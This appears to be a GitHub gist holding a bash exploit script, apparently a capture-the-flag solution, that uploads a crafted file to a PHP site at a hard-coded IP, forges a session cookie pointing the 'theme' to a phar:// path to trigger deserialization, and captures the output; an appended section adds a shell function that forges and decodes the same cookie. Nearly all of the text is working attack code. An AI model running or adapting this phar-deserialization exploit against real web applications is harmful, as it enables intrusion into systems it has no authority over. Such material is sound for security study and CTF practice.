@tyage
Created May 18, 2019 23:22
#!/bin/bash
# Step 1: upload the crafted file. The server stores it under uploads/ and writes the stored name into the
# "avatar" field of the (unpadded base64) session cookie, which is why base64 -d complains and stderr is dropped.
# NOTE: the -F value below was mangled by the page's e-mail obfuscation; the original field=@file is not recoverable here.
IMAGE=$(curl http://153.127.202.154:1002/upload.php -F "[email protected]" -vvv 2>&1 | grep Set-Cookie | sed -r 's/^.*session=([^.]+).*$/\1/' | base64 -d 2>/dev/null | sed -r 's/^.*avatar":"([^"]+).*$/\1/')
echo "$IMAGE"
wget "http://153.127.202.154:1002/uploads/$IMAGE"   # confirm the stored file is reachable at the extracted name
# Step 2: forge a session whose "theme" reaches the upload through the phar:// wrapper. The cookie is base64
# with "=" padding stripped, followed by "." and a fixed suffix reused unchanged (its derivation is not shown here).
node -e "console.log('session=' + Buffer.from('{\"name\":\"AAAAAAAAAAAAAAAA\",\"flash\":{\"type\":\"error\",\"message\":\"Uploaded file is not PNG format.\"},\"theme\":\"phar://./uploads/$IMAGE/exploit\"}', 'binary').toString('base64').replace(/=/g,'') + '.JDJ5JDEwJC5LS1h0UnlUbC5OeHhWVHdFRXovZ095N2taU3NPTXBhTDRnMi4yNXkwMnQ3eHp1dW16SzVt')" > cookie
COOKIE=$(cat cookie)
echo "$COOKIE"
# Step 3: send the forged session; the response (with the phar-triggered output) is saved to ./output.
curl http://153.127.202.154:1002/ -H "Cookie: $COOKIE" --output output
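The gist builds the forged cookie with Node and never checks that it decodes back to the intended JSON; because the cookie's payload has its base64 padding stripped, a plain `base64 -d` fails on it, which is what the script's `2>/dev/null` hides. The following is an added example, not tyage's code, that forges the same session payload in pure shell and restores the padding so the cookie can be decoded and verified before it is sent. It assumes GNU coreutils `base64` (`-w0`, `-d`) and takes the dot-separated suffix as an argument, since the page does not show how that value is derived.

```shell
#!/bin/bash
# Restore the "=" padding that the session format strips, so base64 -d accepts the payload.
b64pad() {
  local s="$1"
  case $(( ${#s} % 4 )) in
    2) s="${s}==" ;;
    3) s="${s}=" ;;
  esac
  printf '%s' "$s"
}

# Build the same session cookie as the gist: unpadded base64(JSON) + "." + suffix.
# $1 = stored upload name (the "avatar" value), $2 = the fixed suffix taken from the gist.
forge_session_cookie() {
  local image="$1" sig="$2" json b64
  json=$(printf '{"name":"AAAAAAAAAAAAAAAA","flash":{"type":"error","message":"Uploaded file is not PNG format."},"theme":"phar://./uploads/%s/exploit"}' "$image")
  b64=$(printf '%s' "$json" | base64 -w0 | tr -d '=')
  printf 'session=%s.%s' "$b64" "$sig"
}

# Decode the JSON part of a "session=<b64>.<suffix>" cookie (base64 never contains ".", so the
# first dot separates payload from suffix). Use this to check a forged cookie before sending it.
decode_session_payload() {
  local payload="${1#session=}"
  payload="${payload%%.*}"
  b64pad "$payload" | base64 -d
}

# Sample run on a constructed upload name (not a real target response).
SIG='JDJ5JDEwJC5LS1h0UnlUbC5OeHhWVHdFRXovZ095N2taU3NPTXBhTDRnMi4yNXkwMnQ3eHp1dW16SzVt'
COOKIE=$(forge_session_cookie 'deadbeef.png' "$SIG")
echo "$COOKIE"
decode_session_payload "$COOKIE"; echo
```

Run it once with the real `$IMAGE` value and compare the decoded JSON against what the target is expected to unserialize; if the `theme` path is wrong, the `phar://` wrapper is never reached and the request simply fails.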